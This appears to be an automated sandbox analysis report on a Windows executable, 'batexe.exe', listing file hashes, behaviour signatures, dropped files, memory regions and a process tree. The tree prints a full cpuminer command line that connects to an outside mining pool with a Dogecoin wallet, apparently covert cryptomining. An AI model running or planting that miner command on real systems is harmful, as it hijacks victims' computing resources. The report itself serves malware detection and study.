Analysis

  • max time kernel
    293s
  • max time network
    297s
  • platform
    windows10-1703_x64
  • resource
    win10-20240214-ja
  • resource tags

    arch:x64arch:x86image:win10-20240214-jalocale:ja-jpos:windows10-1703-x64systemwindows
  • submitted
    23/02/2024, 22:36

General

  • Target

    batexe.exe

  • Size

    9.4MB

  • MD5

    cdc9eacffc6d2bf43153815043064427

  • SHA1

    d05101f265f6ea87e18793ab0071f5c99edf363f

  • SHA256

    73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

  • SHA512

    fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6

  • SSDEEP

    196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score
7/10
upx

Malware Config

Signatures

  • Executes dropped EXE 2 IoCs
  • Loads dropped DLL 5 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\batexe.exe
    "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3288
    • C:\Users\Admin\AppData\Local\Temp\B287.tmp\b2e.exe
      "C:\Users\Admin\AppData\Local\Temp\B287.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B287.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1260
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\B585.tmp\batchfile.bat" "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1180
        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
          cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:3864

Network

        MITRE ATT&CK Enterprise v15

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\B287.tmp\b2e.exe

          Filesize

          3.1MB

          MD5

          e7c031bbd85ebd18db9ae2e9f19d09db

          SHA1

          5fd9de099f3cd57c62c4e360fe541342f938de4d

          SHA256

          ac090793130921d4553957db8feb746bba978992a780522d390a5f672583a094

          SHA512

          4e2b470b0963b712d8b02249de892e4d12c502c94379204c69e6fa43424b987c5ec04ab68060876b02f5dcd5b6f1485faa6cd67a636fb378ba2efabc19b7bbd2

        • C:\Users\Admin\AppData\Local\Temp\B287.tmp\b2e.exe

          Filesize

          2.9MB

          MD5

          a35c9478517b12b8fb5bb53bd90f5bf1

          SHA1

          f9097ef009d19afe9a0c0270fdb69d3f23e19199

          SHA256

          e0e21e55814ec4462a4277ab3c51442f3eba22cef725fd290b9fb9cfbd734d5f

          SHA512

          b1e41d3a03a0aa09a80dc800d4f900ae61fb5afd1b82114754d2b84f5efa990e04e50040e49a1100f0eb3c438fce23bf10eaa8c83508a8f6c264e887820bb4e1

        • C:\Users\Admin\AppData\Local\Temp\B585.tmp\batchfile.bat

          Filesize

          136B

          MD5

          8ea7ac72a10251ecfb42ef4a88bd330a

          SHA1

          c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

          SHA256

          65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

          SHA512

          a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          837KB

          MD5

          632fb8e5fa3514679f31cea76e3e49b9

          SHA1

          ff13e0b2797ba3c0abeacb096d385cfbe061a543

          SHA256

          81620f5208cae0920c0c94dcd44fbb0ae446c087d05a7565ca732c15e3dcf892

          SHA512

          5a1fa774e9b743a20acc4ea9d3b333a55f736a9aab19e978d5849df569c71d98e08e00af50f562e23263b4ea92fabb70a21ed100f8614043c7cc078d8455da23

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

          Filesize

          939KB

          MD5

          a9f61ab91480d5c5ccd55d02262d2863

          SHA1

          0921362e8039e290e4f1ad3d58e9491aaa0ccd90

          SHA256

          5063f0f0632af214f907319b611c2d0eb40587c48f6225d6d0c4f0619e391ad8

          SHA512

          0816c0b8d7b07bbeb6f0c720bc1197ecdddf617aa76728c20aa7b005b6589634d0e93e58bfa128284a1970d1149de6b7172caca7b83e6bea307d8c87dd9e28e5

        • C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          613KB

          MD5

          ce4a95b713e4197ac8296ea22771a192

          SHA1

          1608e9cec310fb881f0686f2ffaa964d7645eb87

          SHA256

          42baf67e119cd0095f9888927eb87b7ff26630a055cb7f158aa9c507e7773039

          SHA512

          1ff30eba46a931f4c8344937a8f4b150a1290b652cd439b691d30e1deca68fe7ab0c62d14fb5985c02ea5419af60e35db54e6f79a98a6f7f9e11800c85053a8a

        • C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          1.1MB

          MD5

          0e6e1333858b8420770c02c85bf22b32

          SHA1

          4f97d364516e2bb87af0359769fb60397a68e65c

          SHA256

          cc2555b03c8b0fe1fbc704f15a7774c3238d6f104a2e758ad57d405396ea16f0

          SHA512

          78c12a2742a8fcbf09525a4e2d1dc3a30a8d79949f6c3cea3bd729a3c89cfde45e4147829a3c180bb410964c596cb13ea30a00addaa9d39bc82a91ed916557fc

        • C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          1011KB

          MD5

          d567c14123891ec33ddda78b4724df6e

          SHA1

          be38548c5e7a5fe1dbc0051645022b00f3569e16

          SHA256

          01eb80777c2320976caa2801f9740ce72091d205767a73e066d3956797e0902a

          SHA512

          2b43222c83fc3812382a697a2a4e6cb893a31b5ab27d1757f03ee82f25d3e34fe96e851efb0c557f3115f480e5869e230e73783eb12d927132412c70c6b93bc0

        • \Users\Admin\AppData\Local\Temp\libcurl-4.dll

          Filesize

          836KB

          MD5

          aeab40ed9a8e627ea7cefc1f5cf9bf7a

          SHA1

          5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

          SHA256

          218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

          SHA512

          c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

        • \Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

          Filesize

          912KB

          MD5

          d3abd251ce1acb4631720a419bd0f8ee

          SHA1

          40a6dff26c81a09d3451cf536d50dbc0e14e5e3a

          SHA256

          56a014b18d354ce18bf8727d60465f852d29fa72f229ac9fbb56a212bd2168c4

          SHA512

          1fe4cd9b68b1415f475bf73237420582b63da40552912142b8c72911a0b81ad8cba4fe0d07b5c990ca71f5c7c22161bbad6a61bf9f471b7f84d6f081d441c5ee

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          744KB

          MD5

          24fab64d542d54196f29593d9df84615

          SHA1

          c6648794db15a14d2c2b0a5bac8410330327322c

          SHA256

          64fc8089429dd346f75b0eaafb5baa3bc985e19f7788953278d7a4695304f245

          SHA512

          19d9e773a0f60ee146082d103c7babd074e0bc766a7b64b7d9e6898c9c1a57aa7e7dbe221c781078deaf42ab506aa93ed31cd220b56ffeea93906e4dc3ddee60

        • \Users\Admin\AppData\Local\Temp\libstdc++-6.dll

          Filesize

          798KB

          MD5

          7c526065af0aaf114a77e15e7528ba18

          SHA1

          1c579c1b4811ad5cb94e526d49c38791ae20d53e

          SHA256

          dc6e20c32e01c11164576ec2c0f4c9df60ad3331e08d79fde187b3d071193c5d

          SHA512

          79cb2063341cc0def8dc6ba29baea7dd943a46d8dccd6a023dbc5ba9bf8350a8c33ebc9dae7e5ac0b0429b2870693ab5464b166fbea95e4ae1937ef5437cde41

        • \Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

          Filesize

          606KB

          MD5

          585efec1bc1d4d916a4402c9875dff75

          SHA1

          d209613666ccac9d0ddab29a3bc59aa00a0968fa

          SHA256

          2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

          SHA512

          b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

        • memory/1260-4-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/1260-50-0x0000000000400000-0x0000000000405000-memory.dmp

          Filesize

          20KB

        • memory/3288-5-0x0000000000400000-0x000000000393A000-memory.dmp

          Filesize

          53.2MB

        • memory/3864-41-0x0000000061440000-0x000000006156B000-memory.dmp

          Filesize

          1.2MB

        • memory/3864-56-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-44-0x0000000001090000-0x0000000002945000-memory.dmp

          Filesize

          24.7MB

        • memory/3864-40-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-45-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-43-0x000000005BBB0000-0x000000005BC48000-memory.dmp

          Filesize

          608KB

        • memory/3864-51-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-42-0x0000000070800000-0x00000000708BC000-memory.dmp

          Filesize

          752KB

        • memory/3864-61-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-66-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-71-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-76-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-81-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-96-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB

        • memory/3864-101-0x0000000000400000-0x0000000000667000-memory.dmp

          Filesize

          2.4MB